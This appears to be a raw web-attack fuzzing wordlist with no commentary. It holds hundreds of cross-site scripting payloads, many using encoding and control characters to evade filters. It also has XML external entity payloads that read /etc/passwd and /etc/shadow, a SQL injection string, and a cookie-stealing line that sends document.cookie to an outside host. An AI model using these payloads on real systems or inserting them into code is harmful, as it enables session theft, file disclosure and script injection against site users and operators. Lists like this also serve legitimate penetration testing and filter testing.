perl -e 'print \";<;IMG SRC=java\0script:alert(\";XSS\";)>;\";;' >; out
perl -e 'print \";<;SCR\0IPT>;alert(\";XSS\";)<;/SCR\0IPT>;\";;' >; out
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
<~/XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/?sid="%2bdocument.cookie)>
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
<~/XSS STYLE=xss:expression(alert('XSS'))>
"><script>alert('XSS')</script>
</XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
XSS STYLE=xss:e/**/xpression(alert('XSS'))>
</XSS STYLE=xss:expression(alert('XSS'))>
>"><script>alert("XSS")</script>&
"><STYLE>@import"javascript:alert('XSS')";</STYLE>
>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)>
>%22%27><img%20src%3d%22javascript:alert(%27%20XSS%27)%22>
'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'
">
>"
;!--"<XSS>=&{()}
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert("XSS ")>
<IMGSRC=java& #115;crip& #116;:ale& #114;t('XS ;S')>
<IMGSRC=ja& #0000118as& #0000099ri& #0000112t:& #0000097le& #0000114t(& #0000039XS& #0000083')>
<IMGSRC=javas& #x63ript:& #x61lert(& #x27XSS')>
<IMG SRC="jav
ascript:alert( 'XSS');">
<IMG SRC="jav
ascript:alert( 'XSS');">
<![CDATA[<script>var n=0;while(true){n++;}</script>]]>
<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('gotcha');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or =']]></foof>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xee;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xee;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/shadow">]><foo>&xee;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///dev/random">]><foo>&xee;</foo>
<script>alert('XSS')</script>
%3cscript%3ealert('XSS')%3c/script%3e
%22%3e%3cscript%3ealert('XSS')%3c/script%3e
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=javascript:alert('XSS')>
<img src=xss onerror=alert(1)>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<BODY BACKGROUND="javascript:alert('XSS')">
<BODY ONLOAD=alert('XSS')>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<IMG SRC="javascript:alert('XSS')"
<iframe src=http://ha.ckers.org/scriptlet.html <
<<SCRIPT>alert("XSS");//<</SCRIPT>
%253cscript%253ealert(1)%253c/script%253e
"><s"%2b"cript>alert(document.cookie)</script>
foo<script>alert(1)</script>
<scr<script>ipt>alert(1)</scr</script>ipt>
<SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT>
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
<marquee onstart='javascript:alert('1');'>=(◕_◕)=
<--`<img/src=` onerror=alert(1)> --!> <script/src=data:text/javascript,alert(1)></script>
"><img src=x onerror=window.open('https://www.google.com/');> <form><button formaction=javascript:alert(1)>CLICKME <math><a xlink:href="//jsfiddle.net/t846h/">click <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object> <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> <a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a> <script\x20type="text/javascript">javascript:alert(1);</script> <script\x3Etype="text/javascript">javascript:alert(1);</script> <script\x0Dtype="text/javascript">javascript:alert(1);</script> <script\x09type="text/javascript">javascript:alert(1);</script> <script\x0Ctype="text/javascript">javascript:alert(1);</script> <script\x2Ftype="text/javascript">javascript:alert(1);</script> <script\x0Atype="text/javascript">javascript:alert(1);</script> '`"><\x3Cscript>javascript:alert(1)</script> '`"><\x00script>javascript:alert(1)</script> <img src=1 href=1 onerror="javascript:alert(1)"></img> <audio src=1 href=1 onerror="javascript:alert(1)"></audio> <video src=1 href=1 onerror="javascript:alert(1)"></video> <body src=1 href=1 onerror="javascript:alert(1)"></body> <image src=1 href=1 onerror="javascript:alert(1)"></image> <object src=1 href=1 onerror="javascript:alert(1)"></object> <script src=1 href=1 onerror="javascript:alert(1)"></script> <svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize> <title onPropertyChange title onPropertyChange="javascript:javascript:alert(1)"></title onPropertyChange> <iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe onLoad> <body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"></body onMouseEnter> <body onFocus body onFocus="javascript:javascript:alert(1)"></body onFocus> <frameset onScroll frameset onScroll="javascript:javascript:alert(1)"></frameset onScroll> <script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1)"></script onReadyStateChange> <html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html onMouseUp> <body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)"></body onPropertyChange> <svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad> <body onPageHide body onPageHide="javascript:javascript:alert(1)"></body onPageHide> <body onMouseOver body onMouseOver="javascript:javascript:alert(1)"></body onMouseOver> <body onUnload body onUnload="javascript:javascript:alert(1)"></body onUnload> <body onLoad body onLoad="javascript:javascript:alert(1)"></body onLoad> <bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1)"></bgsound onPropertyChange> <html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"></html onMouseLeave> <html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"></html onMouseWheel> <style onLoad style onLoad="javascript:javascript:alert(1)"></style onLoad> <iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)"></iframe onReadyStateChange> <body onPageShow body onPageShow="javascript:javascript:alert(1)"></body onPageShow> <style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1)"></style onReadyStateChange> <frameset onFocus frameset onFocus="javascript:javascript:alert(1)"></frameset onFocus> <applet onError applet onError="javascript:javascript:alert(1)"></applet onError> <marquee onStart marquee onStart="javascript:javascript:alert(1)"></marquee onStart> <script onLoad script onLoad="javascript:javascript:alert(1)"></script onLoad> <html onMouseOver html onMouseOver="javascript:javascript:alert(1)"></html onMouseOver> <html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"></html onMouseEnter> <body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)"></body onBeforeUnload> <html onMouseDown html onMouseDown="javascript:javascript:alert(1)"></html onMouseDown> <marquee onScroll marquee onScroll="javascript:javascript:alert(1)"></marquee onScroll> <xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"></xml onPropertyChange> <frameset onBlur frameset onBlur="javascript:javascript:alert(1)"></frameset onBlur> <applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1)"></applet onReadyStateChange> <svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload> <html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html onMouseOut> <body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body onMouseMove> <body onResize body onResize="javascript:javascript:alert(1)"></body onResize> <object onError object onError="javascript:javascript:alert(1)"></object onError> <body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState> <html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html onMouseMove> <applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1)"></applet onreadystatechange> <body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide> <svg onunload svg onunload="javascript:javascript:alert(1)"></svg onunload> <applet onerror applet onerror="javascript:javascript:alert(1)"></applet onerror> <body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup> <body onunload body onunload="javascript:javascript:alert(1)"></body onunload> <iframe onload iframe onload="javascript:javascript:alert(1)"></iframe onload> <body onload body onload="javascript:javascript:alert(1)"></body onload> <html onmouseover html onmouseover="javascript:javascript:alert(1)"></html onmouseover> <object onbeforeload object onbeforeload="javascript:javascript:alert(1)"></object onbeforeload> <body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body onbeforeunload> <body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus> <body onkeydown body onkeydown="javascript:javascript:alert(1)"></body onkeydown> <iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe onbeforeload> <iframe src iframe src="javascript:javascript:alert(1)"></iframe src> <svg onload svg onload="javascript:javascript:alert(1)"></svg onload> <html onmousemove html onmousemove="javascript:javascript:alert(1)"></html onmousemove> <body onblur body onblur="javascript:javascript:alert(1)"></body onblur> \x3Cscript>javascript:alert(1)</script> '"`><script>/* *\x2Fjavascript:alert(1)// */</script> <script>javascript:alert(1)</script\x0D <script>javascript:alert(1)</script\x0A <script>javascript:alert(1)</script\x0B <script charset="\x22>javascript:alert(1)</script> --> <img src=xxx:x onerror=javascript:alert(1)> --> --> --> --> `"'><img src='#\x27 onerror=javascript:alert(1)> <a href="javascript\x3Ajavascript:alert(1)" id="fuzzelement1">test</a>
"'`><svg><script>a='hello\x27;javascript:alert(1)//';</script>
<a href="javas\x00cript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x07cript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x0Dcript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x0Acript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x08cript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x02cript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x03cript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x04cript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x01cript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x05cript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x0Bcript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x09cript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x06cript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x0Ccript:javascript:alert(1)" id="fuzzelement1">test</a> <script>/* *\x2A/javascript:alert(1)// */</script> <script>/* *\x00/javascript:alert(1)// */</script> <style></style\x3E<img src="about:blank" onerror=javascript:alert(1)//></style> <style></style\x0D<img src="about:blank" onerror=javascript:alert(1)//></style> <style></style\x09<img src="about:blank" onerror=javascript:alert(1)//></style> <style></style\x20<img src="about:blank" onerror=javascript:alert(1)//></style> <style></style\x0A<img src="about:blank" onerror=javascript:alert(1)//></style>
"'`>ABC<script>if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}</script> <script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}</script> <script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}</script> '`"><\x3Cscript>javascript:alert(1)</script> '`"><\x00script>javascript:alert(1)</script> "'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)> "'`><\x00img src=xxx:x onerror=javascript:alert(1)> <script src="data:text/plain\x2Cjavascript:alert(1)"></script> <script src="data:\xD4\x8F,javascript:alert(1)"></script> <script src="data:\xE0\xA4\x98,javascript:alert(1)"></script> <script src="data:\xCB\x8F,javascript:alert(1)"></script> <script\x20type="text/javascript">javascript:alert(1);</script> <script\x3Etype="text/javascript">javascript:alert(1);</script> <script\x0Dtype="text/javascript">javascript:alert(1);</script> <script\x09type="text/javascript">javascript:alert(1);</script> <script\x0Ctype="text/javascript">javascript:alert(1);</script> <script\x2Ftype="text/javascript">javascript:alert(1);</script> <script\x0Atype="text/javascript">javascript:alert(1);</script>
ABC<a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a>
`"'><img src=xxx:x \x0Aonerror=javascript:alert(1)>
`"'><img src=xxx:x \x22onerror=javascript:alert(1)>
`"'><img src=xxx:x \x0Bonerror=javascript:alert(1)>
`"'><img src=xxx:x \x0Donerror=javascript:alert(1)>
`"'><img src=xxx:x \x2Fonerror=javascript:alert(1)>
`"'><img src=xxx:x \x09onerror=javascript:alert(1)>
`"'><img src=xxx:x \x0Conerror=javascript:alert(1)>
`"'><img src=xxx:x \x00onerror=javascript:alert(1)>
`"'><img src=xxx:x \x27onerror=javascript:alert(1)>
`"'><img src=xxx:x \x20onerror=javascript:alert(1)>
"`'><script>\x3Bjavascript:alert(1)</script>
"`'><script>\x0Djavascript:alert(1)</script>
"`'><script>\xEF\xBB\xBFjavascript:alert(1)</script>
"`'><script>\xE2\x80\x81javascript:alert(1)</script>
"`'><script>\xE2\x80\x84javascript:alert(1)</script>
"`'><script>\xE3\x80\x80javascript:alert(1)</script>
"`'><script>\x09javascript:alert(1)</script>
"`'><script>\xE2\x80\x89javascript:alert(1)</script>
"`'><script>\xE2\x80\x85javascript:alert(1)</script>
"`'><script>\xE2\x80\x88javascript:alert(1)</script>
"`'><script>\x00javascript:alert(1)</script>
"`'><script>\xE2\x80\xA8javascript:alert(1)</script>
"`'><script>\xE2\x80\x8Ajavascript:alert(1)</script>
"`'><script>\xE1\x9A\x80javascript:alert(1)</script>
"`'><script>\x0Cjavascript:alert(1)</script>
"`'><script>\x2Bjavascript:alert(1)</script>
"`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script>
"`'><script>-javascript:alert(1)</script>
"`'><script>\x0Ajavascript:alert(1)</script>
"`'><script>\xE2\x80\xAFjavascript:alert(1)</script>
"`'><script>\x7Ejavascript:alert(1)</script>
"`'><script>\xE2\x80\x87javascript:alert(1)</script>
"`'><script>\xE2\x81\x9Fjavascript:alert(1)</script>
"`'><script>\xE2\x80\xA9javascript:alert(1)</script>
"`'><script>\xC2\x85javascript:alert(1)</script>
"`'><script>\xEF\xBF\xAEjavascript:alert(1)</script>
"`'><script>\xE2\x80\x83javascript:alert(1)</script>
"`'><script>\xE2\x80\x8Bjavascript:alert(1)</script>
"`'><script>\xEF\xBF\xBEjavascript:alert(1)</script>
"`'><script>\xE2\x80\x80javascript:alert(1)</script>
"`'><script>\x21javascript:alert(1)</script>
"`'><script>\xE2\x80\x82javascript:alert(1)</script>
"`'><script>\xE2\x80\x86javascript:alert(1)</script>
"`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script>
"`'><script>\x0Bjavascript:alert(1)</script>
"`'><script>\x20javascript:alert(1)</script>
"`'><script>\xC2\xA0javascript:alert(1)</script>
"/><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x />
"/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x />
"/><img/onerror=\x09javascript:alert(1)\x09src=xxx:x />
"/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x />
"/><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x />
"/><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x />
"/><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x />
"/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x />
"/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x />
<script\x2F>javascript:alert(1)</script>
<script\x20>javascript:alert(1)</script>
<script\x0D>javascript:alert(1)</script>
<script\x0A>javascript:alert(1)</script>
<script\x0C>javascript:alert(1)</script>
<script\x00>javascript:alert(1)</script>
<script\x09>javascript:alert(1)</script>
"><img src=x onerror=javascript:alert(1)>
"><img src=x onerror=javascript:alert('1')>
"><img src=x onerror=javascript:alert("1")>
"><img src=x onerror=javascript:alert(`1`)>
"><img src=x onerror=javascript:alert(('1'))>
"><img src=x onerror=javascript:alert(("1"))>
"><img src=x onerror=javascript:alert((`1`))>
"><img src=x onerror=javascript:alert(A)>
"><img src=x onerror=javascript:alert((A))>
"><img src=x onerror=javascript:alert(('A'))>
"><img src=x onerror=javascript:alert('A')>
"><img src=x onerror=javascript:alert(("A"))>
"><img src=x onerror=javascript:alert("A")>
"><img src=x onerror=javascript:alert((`A`))>
"><img src=x onerror=javascript:alert(`A`)>
`"'><img src=xxx:x onerror\x0B=javascript:alert(1)>
`"'><img src=xxx:x onerror\x00=javascript:alert(1)>
`"'><img src=xxx:x onerror\x0C=javascript:alert(1)>
`"'><img src=xxx:x onerror\x0D=javascript:alert(1)>
`"'><img src=xxx:x onerror\x20=javascript:alert(1)>
`"'><img src=xxx:x onerror\x0A=javascript:alert(1)>
`"'><img src=xxx:x onerror\x09=javascript:alert(1)>
<script>javascript:alert(1)<\x00/script>
<img src=# onerror\x3D"javascript:alert(1)" >
<input onfocus=javascript:alert(1) autofocus>
<input onblur=javascript:alert(1) autofocus><input autofocus>
<video poster=javascript:javascript:alert(1)//
<body onscroll=javascript:alert(1)>
...
...
...
...
...
<input autofocus>
<form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X
<video><source onerror="javascript:javascript:alert(1)">
<video onerror="javascript:javascript:alert(1)"><source>
<form><button formaction="javascript:javascript:alert(1)">X
<body oninput=javascript:alert(1)><input autofocus>
<math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math>
<frameset onload=javascript:alert(1)>
<head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">XXX</a></body> <SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT> <OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT> <object data="data:text/html;base64,%(base64)s"> <embed src="data:text/html;base64,%(base64)s"> <b <script>alert(1)</script>0
<x '="foo"><x foo='><img src=x onerror=javascript:alert(1)//'> <embed src="javascript:alert(1)"> <img src="javascript:alert(1)"> <image src="javascript:alert(1)"> <script src="javascript:alert(1)">
<? foo="><script>javascript:alert(1)</script>"> <! foo="><script>javascript:alert(1)</script>"> </ foo="><script>javascript:alert(1)</script>"> <? foo="><x foo='?><script>javascript:alert(1)</script>'>"> <! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>"> <% foo><x foo="%><script>javascript:alert(1)</script>">
<img \x00src=x onerror="alert(1)"> <img \x47src=x onerror="javascript:alert(1)"> <img \x11src=x onerror="javascript:alert(1)"> <img \x12src=x onerror="javascript:alert(1)"> <img\x47src=x onerror="javascript:alert(1)"> <img\x10src=x onerror="javascript:alert(1)"> <img\x13src=x onerror="javascript:alert(1)"> <img\x32src=x onerror="javascript:alert(1)"> <img\x47src=x onerror="javascript:alert(1)"> <img\x11src=x onerror="javascript:alert(1)"> <img \x47src=x onerror="javascript:alert(1)"> <img \x34src=x onerror="javascript:alert(1)"> <img \x39src=x onerror="javascript:alert(1)"> <img \x00src=x onerror="javascript:alert(1)"> <img src\x09=x onerror="javascript:alert(1)"> <img src\x10=x onerror="javascript:alert(1)"> <img src\x13=x onerror="javascript:alert(1)"> <img src\x32=x onerror="javascript:alert(1)"> <img src\x12=x onerror="javascript:alert(1)"> <img src\x11=x onerror="javascript:alert(1)"> <img src\x00=x onerror="javascript:alert(1)"> <img src\x47=x onerror="javascript:alert(1)"> <img src=x\x09onerror="javascript:alert(1)"> <img src=x\x10onerror="javascript:alert(1)"> <img src=x\x11onerror="javascript:alert(1)"> <img src=x\x12onerror="javascript:alert(1)"> <img src=x\x13onerror="javascript:alert(1)"> <img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)"> <img src=x onerror=\x09"javascript:alert(1)"> <img src=x onerror=\x10"javascript:alert(1)"> <img src=x onerror=\x11"javascript:alert(1)"> <img src=x onerror=\x12"javascript:alert(1)"> <img src=x onerror=\x32"javascript:alert(1)"> <img src=x onerror=\x00"javascript:alert(1)"> <a href=javascript:javascript:alert(1)>XXX</a> <img src="x` `<script>javascript:alert(1)</script>"` `> <img src onerror /" '"= alt=javascript:alert(1)//"> <title onpropertychange=javascript:alert(1)></title><title title=> <a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>"> <script src="/\%(jscript)s"></script> <script src="\\%(jscript)s"></script> <object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object> <a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X <style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style> <link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d <style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style> <a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">XXX</a></a><a href="javascript:javascript:alert(1)">XXX</a> <style>*[{}@import'%(css)s?]</style>X
<// style=x:expression\28javascript:alert(1)\29> <style>*{x:expression(javascript:alert(1))}</style>
<x style="background:url('x;color:red;/*')">XXX</x> <script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script> <script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script> <script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script> <script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script> <meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi <meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&> <meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾ X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` > 1<set/xmlns=`urn:schemas-microsoft-com:time` style=`behAvior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=javascript:alert(1)>`> 1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=javascript:alert(1)>> <vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe> 1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a> <a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">XXX</a> <x style="behavior:url(%(sct)s)"> <xml id="xss" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label> <event-source src="%(event)s" onload="javascript:alert(1)"> <a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A">
<script>%(payload)s</script>
<script src=%(jscript)s></script>
<script language='javascript' src='%(jscript)s'></script>
<script>javascript:alert(1)</script>
<IMG SRC="javascript:javascript:alert(1);">
<IMG SRC=javascript:javascript:alert(1)>
<IMG SRC=`javascript:javascript:alert(1)`>
<SCRIPT SRC=%(jscript)s?
<FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET>
<BODY ONLOAD=javascript:alert(1)>
<BODY ONLOAD=javascript:javascript:alert(1)>
<IMG SRC="jav ascript:javascript:alert(1);">
<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)>
<SCRIPT/SRC="%(jscript)s"></SCRIPT>
<<SCRIPT>%(payload)s//<</SCRIPT>
<IMG SRC="javascript:javascript:alert(1)"
<iframe src=%(scriptlet)s <
<INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);">
<IMG DYNSRC="javascript:javascript:alert(1)">
<IMG LOWSRC="javascript:javascript:alert(1)">
<BGSOUND SRC="javascript:javascript:alert(1);">
<LAYER SRC="%(scriptlet)s"></LAYER>
